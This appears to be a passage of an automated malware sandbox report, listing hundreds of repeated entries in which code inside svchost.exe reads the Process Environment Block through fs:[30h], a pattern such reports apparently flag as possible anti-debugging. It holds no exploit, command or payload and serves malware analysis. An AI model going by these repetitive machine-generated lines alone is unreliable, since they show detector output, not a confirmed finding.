Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]	2_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]	2_2_0332C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]	2_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]	2_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]	2_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]	2_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]	2_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]	2_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]	2_2_034061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]	2_2_03370185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]	2_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]	2_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]	2_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]	2_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]	2_2_033601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]	2_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]	2_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]	2_2_033C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]	2_2_0332A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]	2_2_0332C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]	2_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]	2_2_033B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]	2_2_0335C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]	2_2_03332050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]	2_2_033B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]	2_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033280A0 mov eax, dword ptr fs:[00000030h]	2_2_033280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]	2_2_033C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]	2_2_0333208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0332C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]	2_2_033720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0332A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]	2_2_033380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]	2_2_033B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]	2_2_033B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]	2_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]	2_2_033AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]	2_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]	2_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]	2_2_03330710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]	2_2_03360710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]	2_2_0336C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]	2_2_03338770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]	2_2_03330750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]	2_2_033BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]	2_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]	2_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]	2_2_033B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]	2_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]	2_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]	2_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]	2_2_033307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]	2_2_033E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]	2_2_033D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]	2_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]	2_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]	2_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]	2_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]	2_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_033BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]	2_2_033B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]	2_2_0334E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]	2_2_03366620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]	2_2_03368620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]	2_2_0333262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]	2_2_03372619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]	2_2_033AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]	2_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]	2_2_03362674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]	2_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]	2_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]	2_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]	2_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]	2_2_0334C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]	2_2_033666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0336C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]	2_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]	2_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]	2_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]	2_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]	2_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]	2_2_033C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]	2_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]	2_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]	2_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]	2_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]	2_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]	2_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]	2_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]	2_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]	2_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]	2_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]	2_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]	2_2_0336E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]	2_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]	2_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]	2_2_03364588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]	2_2_033325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]	2_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]	2_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]	2_2_033365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]	2_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]	2_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]	2_2_0336A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]	2_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]	2_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]	2_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]	2_2_0332C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]	2_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]	2_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]	2_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]	2_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]	2_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]	2_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]	2_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]	2_2_033BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]	2_2_033EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]	2_2_0332645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]	2_2_0335245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]	2_2_033644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_033BA4B0
